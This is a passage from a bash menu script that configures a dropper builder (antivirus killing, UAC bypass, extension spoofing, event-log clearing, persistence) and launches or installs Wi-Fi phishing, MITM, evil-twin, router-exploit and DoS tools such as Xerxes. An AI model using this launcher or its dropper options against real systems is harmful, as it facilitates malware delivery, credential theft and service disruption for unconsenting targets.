  2666. echo -e ""$RS"Script must be on /root/Dr0p1t-Framework/scripts/vbs folder."$CE""
  2667. echo -e ""
  2668. ls -1 /root/Dr0p1t-Framework/scripts/vbs/
  2669. echo -e ""
  2670. echo -e ""$YS"cp"$CE") Copy my script to that folder"
  2671. echo -e ""$YS" b"$CE") Go back"
  2672. echo -e "Enter the name of your script: "
  2673. read RUNVBS
  2674. if [[ "$RUNVBS" = "b" ]]
  2675. then
  2676. RUNVBS="OFF"
  2677. break
  2678. elif [[ "$RUNVBS" = "m" ]]
  2679. then
  2680. clear
  2681. echo -e "Your file path: "
  2682. read FP
  2683. if [[ ! -f "$FP" ]]
  2684. then
  2685. echo -e ""$RS"File does not exist."$CE""
  2686. sleep 2
  2687. else
  2688. cp "$FP" /root/Dr0p1t-Framework/scripts/vbs/
  2689. fi
  2690. elif [[ ! -f /root/Dr0p1t-Framework/scripts/vbs/"$RUNVBS" ]]
  2691. then
  2692. if [[ ! -f /root/Dr0p1t-Framework/scripts/vbs/"$RUNVBS".vbs ]]
  2693. then
  2694. echo -e ""$RS"File not found."$CE""
  2695. sleep 2
  2696. else
  2697. RUNVBS=""$RUNVBS".vbs"
  2698. break
  2699. fi
  2700. else
  2701. break
  2702. fi
  2703. done
  2704. else
  2705. RUNVBS="OFF"
  2706. fi
  2707. elif [[ "$DR" = 7 ]]
  2708. then
  2709. if [[ "$RUNPOW" = "OFF" ]]
  2710. then
  2711. while true
  2712. do
  2713. echo -e ""$RS"Script must be on /root/Dr0p1t-Framework/scripts/powershell folder."$CE""
  2714. echo -e ""
  2715. ls -1 /root/Dr0p1t-Framework/scripts/powershell/
  2716. echo -e ""
  2717. echo -e ""$YS"cp"$CE") Copy my script to that folder"
  2718. echo -e ""$YS" b"$CE") Go back"
  2719. echo -e "Enter the name of your script: "
  2720. read RUNPOW
  2721. if [[ "$RUNPOW" = "b" ]]
  2722. then
  2723. RUNPOW="OFF"
  2724. break
  2725. elif [[ "$RUNPOW" = "m" ]]
  2726. then
  2727. clear
  2728. echo -e "Your file path: "
  2729. read FP
  2730. if [[ ! -f "$FP" ]]
  2731. then
  2732. echo -e ""$RS"File does not exist."$CE""
  2733. sleep 2
  2734. else
  2735. cp "$FP" /root/Dr0p1t-Framework/scripts/powershell/
  2736. fi
  2737. elif [[ ! -f /root/Dr0p1t-Framework/scripts/powershell/"$RUNPOW" ]]
  2738. then
  2739. if [[ ! -f /root/Dr0p1t-Framework/scripts/powershell/"$RUNPOW".ps1 ]]
  2740. then
  2741. echo -e ""$RS"File not found."$CE""
  2742. sleep 2
  2743. else
  2744. RUNPOW=""$RUNPOW".ps1"
  2745. break
  2746. fi
  2747. else
  2748. break
  2749. fi
  2750. done
  2751. else
  2752. RUNPOW="OFF"
  2753. fi
  2754. elif [[ "$DR" = 6 ]]
  2755. then
  2756. if [[ "$RUNBAT" = "OFF" ]]
  2757. then
  2758. while true
  2759. do
  2760. echo -e ""$RS"Script must be on /root/Dr0p1t-Framework/scripts/bat folder."$CE""
  2761. echo -e ""
  2762. ls -1 /root/Dr0p1t-Framework/scripts/bat/
  2763. echo -e ""
  2764. echo -e ""$YS"cp"$CE") Copy my script to that folder"
  2765. echo -e ""$YS" b"$CE") Go back"
  2766. echo -e "Enter the name of your script: "
  2767. read RUNBAT
  2768. if [[ "$RUNBAT" = "b" ]]
  2769. then
  2770. RUNBAT="OFF"
  2771. break
  2772. elif [[ "$RUNBAT" = "m" ]]
  2773. then
  2774. clear
  2775. echo -e "Your file path: "
  2776. read FP
  2777. if [[ ! -f "$FP" ]]
  2778. then
  2779. echo -e ""$RS"File does not exist."$CE""
  2780. sleep 2
  2781. else
  2782. cp "$FP" /root/Dr0p1t-Framework/scripts/bat/
  2783. fi
  2784. elif [[ ! -f /root/Dr0p1t-Framework/scripts/bat/"$RUNBAT" ]]
  2785. then
  2786. if [[ ! -f /root/Dr0p1t-Framework/scripts/bat/"$RUNBAT".bat ]]
  2787. then
  2788. echo -e ""$RS"File not found."$CE""
  2789. sleep 2
  2790. else
  2791. RUNBAT=""$RUNBAT".bat"
  2792. break
  2793. fi
  2794. else
  2795. break
  2796. fi
  2797. done
  2798. else
  2799. RUNBAT="OFF"
  2800. fi
  2801. elif [[ "$DR" = 2 ]]
  2802. then
  2803. if [[ "$STARTUP" = "OFF" ]]
  2804. then
  2805. STARTUP="ON"
  2806. else
  2807. STARTUP="OFF"
  2808. fi
  2809. elif [[ "$DR" = 3 ]]
  2810. then
  2811. if [[ "$TASK" = "OFF" ]]
  2812. then
  2813. TASK="ON"
  2814. else
  2815. TASK="OFF"
  2816. fi
  2817. elif [[ "$DR" = 4 ]]
  2818. then
  2819. if [[ "$LTPUP" = "OFF" ]]
  2820. then
  2821. LTPUP="ON"
  2822. else
  2823. LTPUP="OFF"
  2824. fi
  2825. elif [[ "$DR" = 5 ]]
  2826. then
  2827. if [[ "$KILLANT" = "OFF" ]]
  2828. then
  2829. KILLANT="ON"
  2830. else
  2831. KILLANT="OFF"
  2832. fi
  2833. elif [[ "$DR" = 9 ]]
  2834. then
  2835. if [[ "$UACASADMIN" = "OFF" ]]
  2836. then
  2837. UACASADMIN="ON"
  2838. else
  2839. UACASADMIN="OFF"
  2840. fi
  2841. elif [[ "$DR" = 10 ]]
  2842. then
  2843. if [[ "$SPOOFEXT" = "OFF" ]]
  2844. then
  2845. echo -e "Extension: "
  2846. read SPOOFEXT
  2847. else
  2848. SPOOFEXT="OFF"
  2849. fi
  2850. elif [[ "$DR" = 11 ]]
  2851. then
  2852. if [[ "$ISZIP" = "OFF" ]]
  2853. then
  2854. ISZIP="ON"
  2855. else
  2856. ISZIP="OFF"
  2857. fi
  2858. elif [[ "$DR" = 12 ]]
  2859. then
  2860. if [[ "$COMPRESS" = "OFF" ]]
  2861. then
  2862. COMPRESS="ON"
  2863. else
  2864. COMPRESS="OFF"
  2865. fi
  2866. elif [[ "$DR" = 13 ]]
  2867. then
  2868. if [[ "$DISUAC" = "OFF" ]]
  2869. then
  2870. DISUAC="ON"
  2871. else
  2872. DISUAC="OFF"
  2873. fi
  2874. elif [[ "$DR" = 15 ]]
  2875. then
  2876. if [[ "$EVENT" = "OFF" ]]
  2877. then
  2878. EVENT="ON"
  2879. else
  2880. EVENT="OFF"
  2881. fi
  2882. elif [[ "$DR" = 16 ]]
  2883. then
  2884. if [[ "$COMPILE" = "OFF" ]]
  2885. then
  2886. COMPILE="ON"
  2887. else
  2888. COMPILE="OFF"
  2889. fi
  2890. elif [[ "$DR" = 17 ]]
  2891. then
  2892. if [[ "$D32" = "OFF" ]]
  2893. then
  2894. D32="ON"
  2895. else
  2896. D32="OFF"
  2897. fi
  2898. elif [[ "$DR" = 18 ]]
  2899. then
  2900. if [[ "$D64" = "OFF" ]]
  2901. then
  2902. D64="ON"
  2903. else
  2904. D64="OFF"
  2905. fi
  2906. elif [[ "$DR" = 19 ]]
  2907. then
  2908. if [[ "$BANN" = "OFF" ]]
  2909. then
  2910. BANN="ON"
  2911. else
  2912. BANN="OFF"
  2913. fi
  2914. fi
  2915. done
  2916. }
  2917. function wifi_tools
  2918. {
  2919. while true
  2920. do
  2921. printf '\033]2;WIFI TOOLS\a'
  2922. clear
  2923. TERMINALTITLE="WIFI TOOLS"
  2924. dash_calc
  2925. if [[ -d /root/fluxion ]]
  2926. then
  2927. echo -e ""$YS" 1"$CE") Fluxion The future of MITM WPA attacks"
  2928. else
  2929. echo -e ""$RS" 1"$CE") "$RS"Fluxion"$CE" The future of MITM WPA attacks"
  2930. fi
  2931. if [[ -f /usr/bin/wifite ]]
  2932. then
  2933. echo -e ""$YS" 2"$CE") Wifite Automated wireless attack tool"
  2934. else
  2935. echo -e ""$RS" 2"$CE") "$RS"Wifite"$CE" Automated wireless attack tool"
  2936. fi
  2937. if [[ -d /root/wifiphisher ]]
  2938. then
  2939. echo -e ""$YS" 3"$CE") Wifiphisher Automated phishing attacks against Wi-Fi clients"
  2940. else
  2941. echo -e ""$RS" 3"$CE") "$RS"Wifiphisher"$CE" Automated phishing attacks against Wi-Fi clients"
  2942. fi
  2943. if [[ -d /root/Zatacker ]]
  2944. then
  2945. echo -e ""$YS" 4"$CE") Zatacker MITM-NMAP-Mail Spammer..(Install it manually)"
  2946. else
  2947. echo -e ""$RS" 4"$CE") "$RS"Zatacker"$CE" MITM-NMAP-Mail Spammer..(Install it manually)"
  2948. fi
  2949. if [[ -d /root/morpheus ]]
  2950. then
  2951. echo -e ""$YS" 5"$CE") Morpheus Automated Ettercap TCP/IP Hijacking Tool"
  2952. else
  2953. echo -e ""$RS" 5"$CE") "$RS"Morpheus"$CE" Automated Ettercap TCP/IP Hijacking Tool"
  2954. fi
  2955. #~ if [[ -d /root/osrframework ]]
  2956. #~ then
  2957. #~ echo -e ""$YS" 6"$CE") Osrfconsole Checks usernames-phones to platforms etc.."
  2958. #~ else
  2959. #~ echo -e ""$RS" 6"$CE") "$RS"Osrfconsole"$CE" Checks usernames-phones to platforms etc.."
  2960. #~ fi
  2961. if [[ -d /root/opensource ]]
  2962. then
  2963. echo -e ""$YS" 6"$CE") Netool-toolkit MitM pentesting opensource toolkit"
  2964. else
  2965. echo -e ""$RS" 6"$CE") "$RS"Netool-toolkit"$CE" MitM pentesting opensource toolkit"
  2966. fi
  2967. if [[ -d /root/hakkuframework ]]
  2968. then
  2969. echo -e ""$YS" 7"$CE") Hakku Penetration testing tools"
  2970. else
  2971. echo -e ""$RS" 7"$CE") "$RS"Hakku"$CE" Penetration testing tools"
  2972. fi
  2973. if [[ -d /root/Trity ]]
  2974. then
  2975. echo -e ""$YS" 8"$CE") Trity Advanced pentesting framework"
  2976. else
  2977. echo -e ""$RS" 8"$CE") "$RS"Trity"$CE" Advanced pentesting framework"
  2978. fi
  2979. if [[ -d /root/Dracnmap ]]
  2980. then
  2981. echo -e ""$YS" 9"$CE") Dracnmap Many scan options"
  2982. else
  2983. echo -e ""$RS" 9"$CE") "$RS"Dracnmap"$CE" Many scan options"
  2984. fi
  2985. if [[ -d "/usr/share/fern-wifi-cracker" ]]
  2986. then
  2987. echo -e ""$YS"10"$CE") Fern Wifi cracker GUI"
  2988. else
  2989. echo -e ""$RS"10"$CE") "$RS"Fern"$CE" Wifi cracker GUI"
  2990. fi
  2991. if [[ -f /usr/sbin/netdiscover ]]
  2992. then
  2993. echo -e ""$YS"11"$CE") Netdiscover Network address discovering tool"
  2994. else
  2995. echo -e ""$RS"11"$CE") "$RS"Netdiscover"$CE" Network address discovering tool"
  2996. fi
  2997. if [[ -d /root/kickthemout ]]
  2998. then
  2999. echo -e ""$YS"12"$CE") KickThemOut Kick devices off your network"
  3000. else
  3001. echo -e ""$RS"12"$CE") "$RS"KickThemOut"$CE" Kick devices off your network"
  3002. fi
  3003. if [[ -d "/usr/share/ghost-phisher" ]]
  3004. then
  3005. echo -e ""$YS"13"$CE") Ghost-Phisher Fake AP,MITM,Session hijacking etc..."
  3006. else
  3007. echo -e ""$RS"13"$CE") "$RS"Ghost-Phisher"$CE" Fake AP,MITM,Session hijacking etc..."
  3008. fi
  3009. if [[ -d /root/The-Eye ]]
  3010. then
  3011. echo -e ""$YS"14"$CE") The Eye Detects ARP poisoning DNS spoofing etc..."
  3012. else
  3013. echo -e ""$RS"14"$CE") "$RS"The Eye"$CE" Detects ARP poisoning DNS spoofing etc..."
  3014. fi
  3015. if [[ -d /root/xerxes ]]
  3016. then
  3017. echo -e ""$YS"15"$CE") Xerxes The most powerful DoS tool(CAUTION)"
  3018. else
  3019. echo -e ""$RS"15"$CE") "$RS"Xerxes"$CE" The most powerful DoS tool(CAUTION)"
  3020. fi
  3021. if [[ -d /root/KatanaFramework ]]
  3022. then
  3023. echo -e ""$YS"16"$CE") Katana Framework Many penetration testing features"
  3024. else
  3025. echo -e ""$RS"16"$CE") "$RS"Katana Framework"$CE" Many penetration testing features"
  3026. fi
  3027. if [[ -d /root/airgeddon ]]
  3028. then
  3029. echo -e ""$YS"17"$CE") Airgeddon Audit wireless networks."
  3030. else
  3031. echo -e ""$RS"17"$CE") "$RS"Airgeddon"$CE" Audit wireless networks."
  3032. fi
  3033. if [[ -f /usr/bin/websploit ]]
  3034. then
  3035. echo -e ""$YS"18"$CE") Websploit Advanced MITM framework"
  3036. else
  3037. echo -e ""$RS"18"$CE") "$RS"Websploit"$CE" Advanced MITM framework"
  3038. fi
  3039. if [[ -d /etc/openvas ]]
  3040. then
  3041. echo -e ""$YS"19"$CE") Openvas Vulnerability scanner LAN"
  3042. else
  3043. echo -e ""$RS"19"$CE") "$RS"Openvas"$CE" Vulnerability scanner LAN"
  3044. fi
  3045. if [[ -f /usr/bin/ipscan ]]
  3046. then
  3047. echo -e ""$YS"20"$CE") Angry IP Scanner IP Scanner"
  3048. else
  3049. echo -e ""$RS"20"$CE") "$RS"Angry IP Scanner"$CE" IP Scanner"
  3050. fi
  3051. if [[ -d /root/routersploit ]]
  3052. then
  3053. echo -e ""$YS"21"$CE") Routersploit Find/exploit router vulnerabilities"
  3054. else
  3055. echo -e ""$RS"21"$CE") "$RS"Routersploit"$CE" Find/exploit router vulnerabilities"
  3056. fi
  3057. if [[ -d /root/nWatch ]]
  3058. then
  3059. echo -e ""$YS"22"$CE") nWatch IP scanner/OS detection"
  3060. else
  3061. echo -e ""$RS"22"$CE") "$RS"nWatch"$CE" IP scanner/OS detection"
  3062. fi
  3063. if [[ -d /root/eternal_scanner ]]
  3064. then
  3065. echo -e ""$YS"23"$CE") Eternal scanner Scans hosts for eternalblue vulnerabilities"
  3066. else
  3067. echo -e ""$RS"23"$CE") "$RS"Eternal scanner"$CE" Scans hosts for eternalblue vulnerabilities"
  3068. fi
  3069. if [[ -d /root/eaphammer ]]
  3070. then
  3071. echo -e ""$YS"24"$CE") Eaphammer Evil twin attacks against WPA2-Enterprise networks"
  3072. else
  3073. echo -e ""$RS"24"$CE") "$RS"Eaphammer"$CE" Evil twin attacks against WPA2-Enterprise networks"
  3074. fi
  3075. if [[ -d /root/VMR ]]
  3076. then
  3077. echo -e ""$YS"25"$CE") VMR Best WPS cracker, mdk3-v6"
  3078. else
  3079. echo -e ""$RS"25"$CE") "$RS"VMR"$CE" Best WPS cracker, mdk3-v6"
  3080. fi
  3081. if [[ -d /root/netattack2 ]]
  3082. then
  3083. echo -e ""$YS"26"$CE") Netattack3 Advanced network scan and attack script"
  3084. else
  3085. echo -e ""$RS"26"$CE") "$RS"Netattack2"$CE" Advanced network scan and attack script"
  3086. fi
  3087. if [[ -f /usr/bin/wifi-pumpkin ]]
  3088. then
  3089. echo -e ""$YS"27"$CE") Wifi-Pumpkin Framework for Rogue Wi-Fi Access Point Attack"
  3090. else
  3091. echo -e ""$RS"27"$CE") "$RS"Wifi-Pumpkin"$CE" Framework for Rogue Wi-Fi Access Point Attack"
  3092. fi
  3093. if [[ -d /root/Gloom-Framework ]]
  3094. then
  3095. echo -e ""$YS"28"$CE") Gloom Penetration Testing Framework"
  3096. else
  3097. echo -e ""$RS"28"$CE") "$RS"Gloom"$CE" Penetration Testing Framework"
  3098. fi
  3099. if [[ -f /usr/bin/sechub ]]
  3100. then
  3101. echo -e ""$YS"29"$CE") secHub Security/Hacking Kit"
  3102. else
  3103. echo -e ""$RS"29"$CE") "$RS"secHub"$CE" Security/Hacking Kit"
  3104. fi
  3105. echo -e ""$YS" b"$CE") Go back"
  3106. echo -e ""$YS"00"$CE") Main menu"
  3107. #echo -e ""$YS" 0"$CE") EXIT"
  3108. echo -e "Choose: "
  3109. read -e APPP
  3110. clear
  3111. if [[ "$APPP" = "1" ]]
  3112. then
  3113. if [[ -d /root/fluxion ]]
  3114. then
  3115. cd /root/fluxion
  3116. ./fluxion
  3117. cd
  3118. else
  3119. echo -e "$TNI"
  3120. read INSTALL
  3121. if [[ "$INSTALL" = "install" ]]
  3122. then
  3123. install_fluxion
  3124. else
  3125. continue
  3126. fi
  3127. fi
  3128. elif [[ "$APPP" = "2" ]]
  3129. then
  3130. if [[ -f /usr/bin/wifite ]]
  3131. then
  3132. wifite
  3133. else
  3134. echo -e "$TNI"
  3135. read INSTALL
  3136. if [[ "$INSTALL" = "install" ]]
  3137. then
  3138. install_wifite
  3139. else
  3140. continue
  3141. fi
  3142. fi
  3143. elif [[ "$APPP" = "3" ]]
  3144. then
  3145. if [[ -d /root/wifiphisher ]]
  3146. then
  3147. echo -e "Do you have 1 or 2 wireless interfaces?: "
  3148. read ONEORTWO
  3149. if [[ "$ONEORTWO" = "1" ]]
  3150. then
  3151. clear
  3152. echo -e "Note that with only 1 wireless interface, wifiphisher doesn't deauthenticate the AP."
  3153. sleep 1
  3154. echo -e ""
  3155. echo -e "$PAKTC"
  3156. $READAK
  3157. clear
  3158. wifiphisher -nJ
  3159. else
  3160. clear
  3161. wifiphisher
  3162. fi
  3163. else
  3164. echo -e "$TNI"
  3165. read INSTALL
  3166. if [[ "$INSTALL" = "install" ]]
  3167. then
  3168. install_wifiphisher
  3169. else
  3170. continue
  3171. fi
  3172. fi
  3173. elif [[ "$APPP" = "4" ]]
  3174. then
  3175. if [[ -d /root/Zatacker ]]
  3176. then
  3177. if [[ -d "/root/Zatacker" ]]
  3178. then
  3179. cd /root/Zatacker
  3180. ./ZT.sh
  3181. cd
  3182. else
  3183. echo -e "You have to install it manually since its not on github.Sorry."
  3184. sleep 4
  3185. exec bash "$0"
  3186. fi
  3187. else
  3188. echo -e "$TNI"
  3189. read INSTALL
  3190. if [[ "$INSTALL" = "install" ]]
  3191. then
  3192. install_zatacker
  3193. else
  3194. continue
  3195. fi
  3196. fi
  3197. elif [[ "$APPP" = "5" ]]
  3198. then
  3199. if [[ -d /root/morpheus ]]
  3200. then
  3201. cd /root/morpheus
  3202. ./morpheus.sh
  3203. cd
  3204. else
  3205. echo -e "$TNI"
  3206. read INSTALL
  3207. if [[ "$INSTALL" = "install" ]]
  3208. then
  3209. install_morpheus
  3210. else
  3211. continue
  3212. fi
  3213. fi
  3214. elif [[ "$APPP" = "6" ]]
  3215. then
  3216. if [[ -d "/root/opensource" ]]
  3217. then
  3218. cd /root/opensource
  3219. ./netool.sh
  3220. else
  3221. echo -e "$TNI"
  3222. read INSTALL
  3223. if [[ "$INSTALL" = "install" ]]
  3224. then
  3225. install_netool
  3226. else
  3227. continue
  3228. fi
  3229. fi
  3230. elif [[ "$APPP" = "7" ]]
  3231. then
  3232. if [[ -d /root/hakkuframework ]]
  3233. then
  3234. echo -e "type: 'show modules' to start"
  3235. sleep 2
  3236. clear
  3237. cd /root/hakkuframework
  3238. ./hakku
  3239. cd
  3240. else
  3241. echo -e "$TNI"
  3242. read INSTALL
  3243. if [[ "$INSTALL" = "install" ]]
  3244. then
  3245. install_hakku
  3246. else
  3247. continue
  3248. fi
  3249. fi
  3250. elif [[ "$APPP" = "8" ]]
  3251. then
  3252. if [[ -d /root/Trity ]]
  3253. then
  3254. echo -e "type: 'help' to start"
  3255. sleep 2
  3256. clear
  3257. trity
  3258. else
  3259. echo -e "$TNI"
  3260. read INSTALL
  3261. if [[ "$INSTALL" = "install" ]]
  3262. then
  3263. install_trity
  3264. else
  3265. continue
  3266. fi
  3267. fi
  3268. elif [[ "$APPP" = "9" ]]
  3269. then
  3270. if [[ -d "/root/Dracnmap" ]]
  3271. then
  3272. cd /root/Dracnmap/
  3273. ./dracnmap-v*.sh
  3274. cd
  3275. else
  3276. echo -e "$TNI"
  3277. read INSTALL
  3278. if [[ "$INSTALL" = "install" ]]
  3279. then
  3280. install_dracnmap
  3281. else
  3282. continue
  3283. fi
  3284. fi
  3285. elif [[ "$APPP" = "10" ]]
  3286. then
  3287. if [[ -d "/usr/share/fern-wifi-cracker" ]]
  3288. then
  3289. cd /root/Fern-Wifi-Cracker
  3290. python execute.py
  3291. cd
  3292. else
  3293. echo -e "$TNI"
  3294. read INSTALL
  3295. if [[ "$INSTALL" = "install" ]]
  3296. then
  3297. install_fern
  3298. else
  3299. continue
  3300. fi
  3301. fi
  3302. elif [[ "$APPP" = "11" ]]
  3303. then
  3304. if [[ -f /usr/sbin/netdiscover ]]
  3305. then
  3306. echo -e "Range ("$YS"Enter"$CE"=192.168.1.0/24):"
  3307. read NRANGE
  3308. if [[ -z $NRANGE ]]
  3309. then
  3310. NRANGE="192.168.1.0/24"
  3311. fi
  3312. netdiscover -r $NRANGE -i "$WLANN"
  3313. else
  3314. echo -e "$TNI"
  3315. read INSTALL
  3316. if [[ "$INSTALL" = "install" ]]
  3317. then
  3318. install_netdiscover
  3319. else
  3320. continue
  3321. fi
  3322. fi
  3323. elif [[ "$APPP" = "12" ]]
  3324. then
  3325. if [[ -d "/root/kickthemout" ]]
  3326. then
  3327. cd /root/kickthemout
  3328. python kickthemout.py
  3329. cd
  3330. else
  3331. echo -e "$TNI"
  3332. read INSTALL
  3333. if [[ "$INSTALL" = "install" ]]
  3334. then
  3335. install_kickthemout
  3336. else
  3337. continue
  3338. fi
  3339. fi
  3340. elif [[ "$APPP" = "13" ]]
  3341. then
  3342. if [[ -d "/usr/share/ghost-phisher" ]]
  3343. then
  3344. cd /root/ghost-phisher/Ghost-Phisher
  3345. python ghost.py
  3346. cd
  3347. else
  3348. echo -e "$TNI"
  3349. read INSTALL
  3350. if [[ "$INSTALL" = "install" ]]
  3351. then
  3352. install_ghostphisher
  3353. else
  3354. continue
  3355. fi
  3356. fi
  3357. elif [[ "$APPP" = "14" ]]
  3358. then
  3359. if [[ -d "/root/The-Eye" ]]
  3360. then
  3361. cd /root/The-Eye
  3362. ./TheEye
  3363. cd
  3364. else
  3365. echo -e "$TNI"
  3366. read INSTALL
  3367. if [[ "$INSTALL" = "install" ]]
  3368. then
  3369. install_theeye
  3370. else
  3371. continue
  3372. fi
  3373. fi
  3374. elif [[ "$APPP" = "15" ]]
  3375. then
  3376. if [[ -d "/root/xerxes" ]]
  3377. then
  3378. echo -e "Do you own the site you want to DoS?"$YNONLY""
  3379. read DOSTERM
  3380. if [[ "$DOSTERM" = "y" ]]
  3381. then
  3382.  
  3383. clear
  3384. echo -e "Enter your site(e.g: iownthissite.com): "
  3385. echo -e "(without www)"
  3386. read -e SITEDOS
  3387. clear
  3388. echo -e "Launching www.isitdownrightnow.com for $SITEDOS"
  3389. sleep 4
  3390. gio open http://www.isitdownrightnow.com/"$SITEDOS".html
  3391. clear
  3392. cd /root/xerxes
  3393. SITEDOSX=www.$SITEDOS
  3394. echo -e "Press "$YS"any key"$CE" to start DoS on $SITEDOSX"
  3395. $READAK
  3396. ./xerxes $SITEDOSX 80
  3397. else
  3398. clear
  3399. echo -e "Then never try this."
  3400. sleep 3
  3401. exec bash "$0"
  3402. fi
  3403. else
  3404. echo -e "$TNI"
  3405. read INSTALL
  3406. if [[ "$INSTALL" = "install" ]]
  3407. then
  3408. install_xerxes
  3409. else
  3410. continue
  3411. fi
  3412. fi
  3413. elif [[ "$APPP" = "16" ]]
  3414. then
  3415. if [[ -d "/usr/share/KatanaFramework" ]]
  3416. then
  3417. ktf.console
  3418. else
  3419. echo -e "$TNI"
  3420. read INSTALL
  3421. if [[ "$INSTALL" = "install" ]]
  3422. then
  3423. install_katana
  3424. else
  3425. continue
  3426. fi
  3427. fi
  3428. elif [[ "$APPP" = "17" ]]
  3429. then
  3430. if [[ -d "/root/airgeddon" ]]
  3431. then
  3432. cd /root/airgeddon
  3433. ./airgeddon.sh
  3434. cd
  3435. else
  3436. echo -e "$TNI"
  3437. read INSTALL
  3438. if [[ "$INSTALL" = "install" ]]
  3439. then
  3440. install_airgeddon
  3441. else
  3442. continue
  3443. fi
  3444. fi
  3445. elif [[ "$APPP" = "18" ]]
  3446. then
  3447. if [[ -d "/usr/share/websploit" ]]
  3448. then
  3449. websploit
  3450. else
  3451. echo -e "$TNI"
  3452. read INSTALL
  3453. if [[ "$INSTALL" = "install" ]]
  3454. then
  3455. install_websploit
  3456. else
  3457. continue
  3458. fi
  3459. fi
  3460. elif [[ "$APPP" = "19" ]]
  3461. then
  3462. if [[ -d /etc/openvas ]]
  3463. then
  3464. echo -e "Start or stop?("$YS"start"$CE"/"$YS"stop"$CE")"
  3465. read -e SORS
  3466. if [[ "$SORS" == "start" ]]
  3467. then
  3468. netstat -nltp
  3469. openvas-start
  3470. echo -e "Launching firefox..."
  3471. sleep 1
  3472. firefox https://127.0.0.1:9392
  3473. else
  3474. openvas-stop
  3475. fi
  3476. else
  3477. echo -e "$TNI"
  3478. read INSTALL
  3479. if [[ "$INSTALL" = "install" ]]
  3480. then
  3481. install_openvas
  3482. else
  3483. continue
  3484. fi
  3485. fi
  3486. elif [[ "$APPP" = "20" ]]
  3487. then
  3488. if [[ -d "/usr/lib/ipscan" ]]
  3489. then
  3490. bash /usr/bin/ipscan & disown
  3491. else
  3492. echo -e "$TNI"
  3493. read INSTALL
  3494. if [[ "$INSTALL" = "install" ]]
  3495. then
  3496. install_angryip
  3497. else
  3498. continue
  3499. fi
  3500. fi
  3501. elif [[ "$APPP" = "21" ]]
  3502. then
  3503. if [[ -d "/root/routersploit" ]]
  3504. then
  3505. cd /root/routersploit
  3506. ./rsf.py
  3507. cd
  3508. else
  3509. echo -e "$TNI"
  3510. read INSTALL
  3511. if [[ "$INSTALL" = "install" ]]
  3512. then
  3513. install_routersploit
  3514. else
  3515. continue
  3516. fi
  3517. fi
  3518. elif [[ "$APPP" = "22" ]]
  3519. then
  3520. if [[ -d "/root/nWatch" ]]
  3521. then
  3522. cd /root/nWatch
  3523. python nwatch.py
  3524. cd
  3525. else
  3526. echo -e "$TNI"
  3527. read INSTALL
  3528. if [[ "$INSTALL" = "install" ]]
  3529. then
  3530. install_nwatch
  3531. else
  3532. continue
  3533. fi
  3534. fi
  3535. elif [[ "$APPP" = "23" ]]
  3536. then
  3537. if [[ -d "/root/eternal_scanner" ]]
  3538. then
  3539. cd /root/eternal_scanner
  3540. ./escan
  3541. cd
  3542. else
  3543. echo -e "$TNI"
  3544. read INSTALL
  3545. if [[ "$INSTALL" = "install" ]]
  3546. then
  3547. install_eternalscanner
  3548. else
  3549. continue
  3550. fi
  3551. fi
  3552. elif [[ "$APPP" = "24" ]]
  3553. then
  3554. if [[ -d "/root/eaphammer" ]]
  3555. then
  3556. eaphammer_automation
  3557. else
  3558. echo -e "$TNI"
  3559. read INSTALL
  3560. if [[ "$INSTALL" = "install" ]]
  3561. then
  3562. install_eaphammer
  3563. else
  3564. continue
  3565. fi
  3566. fi
  3567. cd
  3568. elif [[ "$APPP" = "25" ]]
  3569. then
  3570. if [[ -d "/root/VMR" ]]
  3571. then
  3572. cd /root/VMR
  3573. ./VMR-MDK-K2-2017R-012x2.sh
  3574. else
  3575. echo -e "$TNI"
  3576. read INSTALL
  3577. if [[ "$INSTALL" = "install" ]]
  3578. then
  3579. install_vmr
  3580. else
  3581. continue
  3582. fi
  3583. fi
  3584. cd
  3585. elif [[ "$APPP" = "26" ]]
  3586. then
  3587. if [[ -d "/root/netattack2" ]]
  3588. then
  3589. cd /root/netattack2
  3590. python2 netattack2.py
  3591. else
  3592. echo -e "$TNI"
  3593. read INSTALL
  3594. if [[ "$INSTALL" = "install" ]]
  3595. then
  3596. install_netattack2
  3597. else
  3598. continue
  3599. fi
  3600. fi
  3601. cd
  3602. elif [[ "$APPP" = "27" ]]
  3603. then
  3604. if [[ -f "/usr/bin/wifi-pumpkin" ]]
  3605. then
  3606. wifi-pumpkin
  3607. else
  3608. echo -e "$TNI"
  3609. read INSTALL
  3610. if [[ "$INSTALL" = "install" ]]
  3611. then
  3612. install_wifi_pumpkin
  3613. else
  3614. continue
  3615. fi
  3616. fi
  3617. cd
  3618. elif [[ "$APPP" = "28" ]]
  3619. then
  3620. if [[ -d "/root/Gloom-Framework" ]]
  3621. then
  3622. cd /root/Gloom-Framework
  3623. python gloom.py
  3624. else
  3625. echo -e "$TNI"
  3626. read INSTALL
  3627. if [[ "$INSTALL" = "install" ]]
  3628. then
  3629. install_gloom
  3630. else
  3631. continue
  3632. fi
  3633. fi
  3634. cd
  3635. elif [[ "$APPP" = "29" ]]
  3636. then
  3637. if [[ -f "/usr/bin/sechub" ]]
  3638. then
  3639. sechub
  3640. else
  3641. echo -e "$TNI"
  3642. read INSTALL
  3643. if [[ "$INSTALL" = "install" ]]
  3644. then
  3645. install_sechub
  3646. else
  3647. continue
  3648. fi
  3649. fi
  3650. cd
  3651. elif [[ "$APPP" = "7" ]]
  3652. then
  3653. if [[ -d "/root/hakkuframework" ]]
  3654. then
  3655. while true
  3656. do
  3657. printf '\033]2;OSRFCONSOLE\a'
  3658. clear
  3659. echo -e ""$YS" 1"$CE") usufy"
  3660. echo -e ""$YS" 2"$CE") mailfy"
  3661. echo -e ""$YS" 3"$CE") searchfy"
  3662. echo -e ""$YS" 4"$CE") domainfy"
  3663. echo -e ""$YS" 5"$CE") phonefy"
  3664. echo -e ""$YS" 6"$CE") entify"
  3665. echo -e ""$YS" b"$CE") Go back"
  3666. echo -e ""$YS"00"$CE") Main menu"
  3667. # echo -e ""$YS" 0"$CE") EXIT"
  3668. echo -e "Choose: "
  3669. read -e OSFR
  3670. clear
  3671. if [[ "$OSFR" = "1" ]]
  3672. then
  3673. echo -e "Use: usufy.py -n name1 name2 -p twitter facebook"
  3674. usufy.py
  3675. exit
  3676. elif [[ "$OSFR" = "2" ]]
  3677. then
  3678. echo -e "Use: mailfy.py -n name1"
  3679. mailfy.py
  3680. exit
  3681. elif [[ "$OSFR" = "3" ]]
  3682. then
  3683. searchfy.py
  3684. exit
  3685. elif [[ "$OSFR" = "4" ]]
  3686. then
  3687. domainfy.py
  3688. exit
  3689. elif [[ "$OSFR" = "5" ]]
  3690. then
  3691. phonefy.py
  3692. exit
  3693. elif [[ "$OSFR" = "6" ]]
  3694. then
  3695. entify.py
  3696. exit
